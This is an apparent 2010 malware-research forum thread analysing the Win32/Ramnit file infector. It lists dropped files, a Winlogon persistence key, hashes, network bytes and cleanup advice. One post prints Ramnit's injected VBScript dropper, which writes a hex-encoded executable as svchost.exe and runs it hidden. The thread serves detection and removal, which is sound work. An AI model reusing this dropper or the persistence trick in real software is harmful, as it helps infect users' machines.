Win32/Ramnit

Forum for analysis and discussion about malware.

Win32/Ramnit

Postby Sneakyone » Fri Aug 13, 2010 12:13 am

Hi everybody.

It seems this new infection is a new polymorphic file infector and it infects ALOT of files and once they are cleaned it infects them + more again, similar to virut/sality.

I will ask these two users who are badly infected with it to format in a minute, just want to bring this to the attention of everyone.

(Note: Look at the ESET logs, it is the one that picked up the infected files.)

1. http://www.geekpolice.net/virus-spyware ... t23218.htm

2. http://www.pchelpforum.com/progress-hij ... post532721

The file Desktoplayer.exe is the main part of the infection it will keep re-appearing and infecting more files.

Also, it will create a dummy files that look like this:

FirefoxSrv.exe
UserinitSrv.exe
ExplorerSrv.exe

My suggestion is running a ESET scan as soon as you see desktoplayer.exe and if it finds a ton of infected files tell them to format without backing anything up.

It is unfortunate, but that is the only way so far.
Sneakyone
 
Posts: 8
Joined: Tue Jun 29, 2010 6:47 am
Reputation point: 0

Re: Ramnit.A

Postby Quads » Fri Aug 13, 2010 12:47 am

http://www.threatexpert.com/report.aspx ... 975182c819

This could be added inside .htm and .html files on hard drives

&lt;script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

They are having fun here http://www.bleepingcomputer.com/forums/topic336044.html

Looks lie they are getting somewhere with this one http://www.bleepingcomputer.com/forums/topic335436.html

Quads
Quads
 
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand
Reputation point: 22

Re: Ramnit.A

Postby Sneakyone » Fri Aug 13, 2010 3:31 am

Hi.

Thanks for the reply.

I will try to continue working on it now, but it will probably get lengthy, if you have any more suggestions they will be greatly appreciated. ;)
Sneakyone
 
Posts: 8
Joined: Tue Jun 29, 2010 6:47 am
Reputation point: 0

Re: Ramnit.A

Postby PX5 » Fri Aug 13, 2010 9:03 am

lol@bleeping link, dudes machine is toasted.

Ramnit = FUFI! :lol:
Arrogance led me to my Ignorance
PX5
 
Posts: 144
Joined: Thu Apr 29, 2010 1:14 am
Reputation point: 53

Re: Ramnit.A

Postby Quads » Fri Aug 13, 2010 9:47 am

Hmmmm just depends, I had 2 PC's turn up needing Malware removed, early on when Virut appeared and the systems were infected with Virut + rootkits, I managed to remove Virut and the other Malware, without needing to reinstall Windows or reformat as the user did not have the Dell OS discs or backups.

It was fun, took some time and only had to reinstall a couple of 3 party programs and Windows files replaced.

Quads
Quads
 
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand
Reputation point: 22

Re: Ramnit.A

Postby SecConnex » Fri Aug 13, 2010 3:33 pm

I did a short analysis of it last night, because after a while it got a little scary. :P But anyway, in testing it, I came up with a few conclusions, I believe I should share about this infection.

Win32\Ramnit is a fairly new infection, with three currently active variants. Normally, they pair with each other when infecting the machine.

The first variant is a backdoor trojan that looks like ZBOT. The second variant is a rootkit that looks like TDL3 and behaves like Trojan.Agent, and a worm that spreads via removable media. The third variant, and the final, is a polymorphic file infection that behaves like Sality and looks like Virut.

(Keep in mind, I states heuristic terms here, "looks like", "behaves like".

Behavior

-Modifies the Userinit key in Winlogon:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe"


-Reads running processes, then creates dummy files named after the running processes and infects most files loaded in running processes, and sends the legit files to a bak folder locked from Windows API. For example: userinitsrv.exe

-Creates its main file: c:\program files\microsoft\desktoplayer.exe, which is known as itself, Trojan.Ramnit, the trojan downloader or malware dropper.

-The main trojan component is known to be Trj.Agent, while the dummy files are infected with Trj.IRCNite, an IRC trojan, and ZBOT.

-It uses rootkit techniques to conceal its presence on the system. It *may* infect two random system files, which is related to TDL3.


Removal

-Most online scanners will detect it. Also, MBAM will detect some of it, especially subtle changes in the OS. ComboFix will delete odd looking files.


Overall, the damage to the system is too great, that we are recommending a primary disinfection, then reformat and reinstall.

Here is how it should be disinfected:

A. TDSSKiller
B. ComboFix
C. Reformat and reinstall.

You cannot allow the infected drivers to stay put. They need to be disinfected, or the infection can carry over, even with a reformat and reinstall.
Jay
seCURE Connexion Consultant
SecConnex
 
Posts: 90
Joined: Sat May 01, 2010 3:35 am
Location: Ohio, United States
Reputation point: 8

Re: Ramnit.A

Postby EP_X0FF » Fri Aug 13, 2010 3:35 pm

Providing dropper sample will be very good.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Ramnit.A

Postby SecConnex » Fri Aug 13, 2010 3:41 pm

I'm so sorry. I lost access to the internet after most files got infected. I attempted to grab some samples, but the infection was too great.

I suppose I could have attempted to reverse a couple of the files, and grab some of their malcode.

I got the MD5 of DesktopLayer.exe, which is its main file: 1E28B93DF4DC13BA183D7CAC665BC45E

MD5 of a couple infected files: 074A688443FAEA25C2589975069DE044

I did get a little bit of traffic code, though:

Port 443
00000010 | 0000 7A65 7573 5553 0008 0000 0075 736F | ..zeusUS.....uso
00000020 | 772E 6578 6500 FF4C 0000 00E2 0021 0000 | w.exe..L.....!..
00000080 | 0000 0064 6F67 6D61 000E 0000 0031 3238 | ...dogma.....128
00000090 | 3033 3536 3236 392E 6578 65E8 00FF 4C00 | 0356269.exe...L.
00000120 | 0100 0000 280A 0000 0200 0000 5365 7276 | ....(.......Serv
00000130 | 6963 6520 5061 636B 2032 0000 0000 0000 | ice Pack 2......


VirusTotal: http://www.virustotal.com/file-scan/rep ... 1281653802
http://www.virustotal.com/file-scan/rep ... 1281446347
Jay
seCURE Connexion Consultant
SecConnex
 
Posts: 90
Joined: Sat May 01, 2010 3:35 am
Location: Ohio, United States
Reputation point: 8

Re: Ramnit.A

Postby fatdcuk » Fri Aug 13, 2010 5:27 pm

Hi EP,

Heres a Z-bot patched by Ramnit.A

LOL Jay ...same as Virut/Sality/Parite..they like appending their code to files(and that includes other malwares shock,horror)...

PX5 can vouch for what a mess this made in a VM for him earliar this week...i had to reload selector too :lol:
You do not have the required permissions to view the files attached to this post.
Ade Gill
Malwarebytes Researcher
Image
fatdcuk
 
Posts: 46
Joined: Mon Mar 15, 2010 7:45 pm
Reputation point: 78

Re: Ramnit.A

Postby SecConnex » Fri Aug 13, 2010 8:51 pm

Rofl. I think I need a better VM. I've only had VBox for quite a while.

I need my test machine back, because I hate working in VMs with new infections. They seem to just kill the VM.
Jay
seCURE Connexion Consultant
SecConnex
 
Posts: 90
Joined: Sat May 01, 2010 3:35 am
Location: Ohio, United States
Reputation point: 8

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 14 guests